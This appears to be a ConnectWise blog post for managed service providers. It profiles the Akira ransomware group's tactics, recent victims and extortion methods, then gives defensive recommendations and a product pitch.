Akira ransomware emerged in March 2023 as one of the most financially successful and technically sophisticated ransomware operations targeting critical infrastructure worldwide. Operating as a ransomware-as-a-service (RaaS) group, Akira has collected over $244 million in ransom payments and claimed hundreds of victims across manufacturing, healthcare, education, financial services, and IT sectors as of late 2025. Notably, this represents an approximate five-times year-over-year increase in ransom revenue, underscoring the group’s rapid growth and escalating impact.
The ransomware gained notoriety for its aggressive double-extortion tactics, lightning-fast data exfiltration capabilities, and distinctive retro-themed data leak site styled after 1980s “green screen” consoles. Akira threat actors, potentially linked to the defunct Conti ransomware group, primarily target small and midsized businesses (SMBs) but have also successfully compromised larger organizations.
For managed service providers (MSPs) advising clients on cybersecurity best practices, understanding Akira’s evolving tactics is critical. The group has demonstrated remarkable adaptability, expanding from Windows systems to Linux variants targeting VMware ESXi virtual machines and, as of June 2025, Nutanix AHV environments. Recent CISA and FBI advisories warn that Akira remains one of the top five ransomware variants actively threatening US businesses, with activity accelerating dramatically throughout 2025. Keep reading for comprehensive guidance on protecting your clients from this persistent threat.
Akira ransomware actors typically gain unauthorized access through compromised VPN credentials, exploited vulnerabilities in edge devices, or stolen credentials purchased from initial access brokers. Throughout 2025, Akira operators have actively exploited critical vulnerabilities, including CVE-2024-40766 (SonicWall), CVE-2023-20269 (Cisco ASA/FTD), and vulnerabilities in Veeam backup servers.
Once inside a network, Akira threat actors move with exceptional speed. CISA reporting from November 2025 confirms that in some incidents, they’ve exfiltrated data in just over two hours from initial access. They establish persistent access using legitimate remote access tools such as AnyDesk and LogMeIn, then deploy reconnaissance tools, including ADFind, to gather Microsoft Entra ID information and network scanners to map the environment. The attackers then use the gathered information to create new domain accounts and employ Kerberoasting techniques to harvest credentials from Entra ID. They typically focus on domain controllers, backup infrastructure, and virtualization infrastructure for credential harvesting, then use these accounts to deploy the ransomware.
During the exfiltration phase, Akira actors compress sensitive data using WinRAR and transfer it via FileZilla, WinSCP, or RClone to cloud storage or through encrypted tunnels such as Ngrok. The ransomware then deploys using a sophisticated hybrid ChaCha20/RSA encryption scheme, appending file extensions including .akira, .akiranew, .powerranges, or .aki to encrypted files. Unlike some ransomware groups, Akira doesn’t leave an initial ransom demand. Victims must contact the attackers through a Tor-based portal to receive payment instructions.
Akira’s double-extortion model adds significant pressure: If victims refuse to pay for decryption keys, the threat actors publish stolen data on their leak site. In some cases, they’ve even called victimized companies directly to increase pressure. This multilayered approach makes Akira particularly challenging for organizations to navigate.
Akira activity accelerated dramatically in 2025, with the group already claiming twice as many victims in the first months of 2025 as they did in all of 2024. In November 2024 alone, Akira published details of 73 victims, with 35+ appearing on their leak site in a single day, an unprecedented surge that continued throughout 2025.
Hitachi Vantara
In April 2025, major cyber-infrastructure provider Hitachi Vantara reported a disruptive ransomware incident and took servers offline. Multiple cybersecurity outlets linked the activity to Akira, though the vendor continued its investigation. For a service provider such as Hitachi Vantara that hosts multiple customers, the downtime resulted in an extremely costly attack affecting downstream clients.
SonicWall Financial Sector Campaign
Beginning in July 2025, Akira launched an aggressive campaign exploiting CVE-2024-40766 in SonicWall firewall devices, specifically targeting financial institutions’ remote access infrastructure. The ConnectWise Cyber Research Unit™ (CRU) reported a marked increase in Akira activity targeting SonicWall SSL VPN accounts from late July through the remainder of 2025. In October 2025 alone, attackers using Akira compromised over 70 victims by exploiting publicly accessible SonicWall devices. This sustained campaign demonstrated Akira operators’ ability to rapidly weaponize newly disclosed vulnerabilities and maintain pressure on specific sectors.
Global Data Storage Company
A detailed analysis published by Palo Alto Networks Unit 42 in November 2025 revealed a sophisticated 42-day compromise of a global data storage and infrastructure company. The attack, orchestrated by Howling Scorpius, the group that distributes Akira ransomware, began when an employee clicked on what appeared to be a routine CAPTCHA check on a compromised car dealership website. This social engineering technique, called ClickFix, disguised malware delivery as a legitimate security verification.
The incident exposed a critical gap in detection capabilities. The victim company had deployed two different enterprise endpoint detection and response (EDR) solutions that recorded all malicious activity in their logs, yet generated very few alerts. This meant security teams had theoretical visibility but no practical awareness until encryption began across three separate networks.
RJS Corporation
On January 7, 2026, Akira claimed responsibility for a cyberattack on RJS Corporation, a major player in the tire manufacturing sector based in the US. The threat actors announced plans to release sensitive corporate and employee data unless their demands were met, continuing Akira’s pattern of targeting manufacturing companies.
Epport, Richman & Robbins, LLP
On January 13, 2026, Akira targeted this renowned Los Angeles-based law firm, compromising 10GB of sensitive legal data. The attack exemplified Akira’s continued focus on professional services firms that handle confidential client information, where the threat of data exposure carries significant regulatory and reputational consequences.
Sophos analysis indicates that 149 victims have been linked to Akira ransomware attacks in the 90 days preceding November 2025, with a predominance in manufacturing, legal and professional services, and construction and engineering sectors. The group has also targeted MSPs, including Toppan Next Tech, a Singapore-based printing company that reported a ransomware intrusion exposing client statements.
The FBI reports that Akira is currently among the top five ransomware variants targeting US businesses out of over 130 active ransomware groups under investigation. With the group’s tactics constantly evolving and their technical capabilities expanding to include Nutanix AHV environments as of June 2025, understanding Akira’s methodology remains essential for protecting your clients.
When an organization has been compromised by Akira ransomware, the attackers communicate exclusively through their Tor-based negotiation portal. Victims must enter a unique password from the ransom note to access this portal, where Akira operators provide proof of stolen data and present payment demands.
In a revealing 2025 case documented by security researchers, Akira encrypted an organization’s systems and demanded $600,000, ultimately settling for $200,000. What made this incident particularly notable was the attackers’ final message. It didn’t just include a decryption tool, but came with a security checklist. “Don’t want us to hack you again? Here’s what you need to do,” the attackers wrote, before signing off with the unsettling note: “We wish you safety, calmness, and lots of benefits in the future.”
Payment of the ransom is strongly discouraged by law enforcement and cybersecurity authorities. Paying does not guarantee that files will be decrypted or that stolen data won’t be published. Additionally, ransom payments fund further criminal operations and encourage additional attacks on other organizations. The FBI emphasizes that paying ransoms makes organizations attractive targets for future attacks. Data from Coretelligent reveals a notable shift: Only 25% of victims now agree to pay ransoms, the lowest rate seen in three years, prompting Akira to rely even more heavily on data theft as extortion leverage.
If your client experiences an Akira incident, immediate reporting is critical. Contact the FBI’s Internet Crime Complaint Center (IC3), your local FBI field office, or CISA’s 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-SAY-CISA (1-844-729-2472). Early reporting enables law enforcement to track threat actor patterns and potentially recover stolen funds through cryptocurrency tracing.
Protecting against Akira ransomware requires a comprehensive, layered defense strategy. Because Akira actors continuously evolve their techniques, most recently expanding to target Nutanix AHV environments in June 2025 and deploying the faster Akira_v2 encryption variant, MSPs must maintain vigilant security postures across all client networks.
Akira actively exploits specific vulnerabilities in VPN products, edge devices, and backup servers. The SonicWall campaign that began in July 2025 and remained active through the remainder of the year demonstrates the group’s focus on unpatched edge devices. Establish a rigorous patch management process that remediates known exploited vulnerabilities within 30 days, prioritizing:
Regular vulnerability scanning and automated patch deployment help reduce the attack surface that Akira operators actively target.
The majority of Akira compromises begin with stolen credentials or brute force attacks against VPN services lacking multi-factor authentication (MFA). Throughout 2025, Akira operators increasingly used stolen or purchased admin credentials to gain initial access. Implement and strictly enforce phishing-resistant MFA for:
Hardware-based MFA tokens provide the strongest protection for critical systems. Even organizations with MFA enabled should ensure it’s configured correctly, as Akira has successfully targeted improperly configured VPN implementations.
Akira specifically targets backup infrastructure, often deleting volume shadow copies and compromising backup servers before deploying encryption. The November 2025 Palo Alto Networks case study revealed that Akira can exfiltrate data from Veeam servers in approximately two hours, demonstrating their focus on neutralizing recovery capabilities.
To combat this, implement a robust 3-2-1 backup strategy: Maintain three copies of data on two different media types, with one copy stored offline and air-gapped from the network. Regular backup testing and restoration exercises ensure recovery capabilities remain functional when needed most.
Akira’s rapid attack timeline, sometimes exfiltrating data within two hours of initial access, demands real-time threat detection capabilities. The November 2025 global data storage company incident revealed a critical gap: organizations deploying EDR solutions that log activity without generating actionable alerts. Palo Alto Networks’ Global Incident Response 2025 report found that in 75% of incidents analyzed, clear evidence of malicious activity existed in logs but remained hidden due to inadequate alerting.
Deploy Managed EDR solutions with 24/7 security operations center (SOC) monitoring configured to actively alert on:
EDR solutions should include behavioral detection capabilities to identify legitimate tools being abused for malicious purposes, as Akira frequently weaponizes administrative utilities.
A major technical development in 2025 was Akira’s expansion beyond VMware ESXi to successfully encrypt Nutanix AHV virtual disk files for the first time in June. This expansion is particularly concerning given Gartner’s prediction that by 2028, 35% of VMware workloads will have migrated to alternative platforms, with Nutanix frequently suggested as a first choice.
Implement additional protections for hypervisor management interfaces:
Akira operators frequently gain access using compromised credentials purchased from initial access brokers, stolen VPN accounts, or brute force attacks against weak passwords. Implement CISA-recommended password length and complexity standards, enforce regular credential rotation for privileged accounts, and deploy password managers to eliminate credential reuse.
In addition, organizations should implement stronger controls around administrative and privileged access. Secure remote administrative sessions, enforcing least-privilege access, and monitoring how least-privileged credentials are used can help prevent attackers from escalating privileges or moving laterally after gaining initial access. Tight oversight of privileged account usage and remote management activity reduces the likelihood that compromised credentials can be leveraged to access domain controllers, backup infrastructure, or other critical systems commonly targeted in ransomware attacks.
Investigate signs of credential compromise promptly, including repeated failed login attempts, unusual access patterns, and leaked credentials appearing in breach databases.
Stay current with CISA and FBI #StopRansomware advisories, which provide updated indicators of compromise (IOCs) and tactics specific to Akira operations. The November 13, 2025, advisory update included critical new TTPs from recent attacks. Subscribe to threat intelligence feeds and participate in information-sharing organizations such as FS-ISAC or MS-ISAC to receive early warning of emerging Akira campaigns.
To strengthen your security posture even further, leverage provider-driven threat intelligence from the ConnectWise Cybersecurity Research Unit (CRU), which delivers continuous MSP-focused insights, including the annual MSP Threat Report..
A robust cybersecurity solution empowers MSPs with the resources, information, and software needed to stay ahead of evolving threats, such as Akira ransomware. These tools are essential to preventing and mitigating ransomware attacks that can devastate client operations.
With detection and response solutions such as Managed EDR and SIEM, plus vulnerability management, email security, security awareness training, and privileged access controls for securing remote administrative sessions with solutions such as Privileged Access, ConnectWise offers a suite of cybersecurity management software and support solutions to help protect your clients’ most critical assets.
Explore our cybersecurity demo to see firsthand how the right solution can help uplevel your cybersecurity offerings and defend against sophisticated threats, including Akira ransomware.
Share:
Akira is a ransomware-as-a-service (RaaS) operation that encrypts systems and steals sensitive data, using double extortion to pressure victims into paying.
Akira most often gains entry through:
Key differentiators include:
Akira primarily targets small and midsized businesses (SMBs) but has also impacted large enterprises across:
No. Law enforcement strongly discourages payment because:
Key defenses include:
In some cases, attackers have moved from initial access to full data exfiltration in just a few hours, making early detection critical.
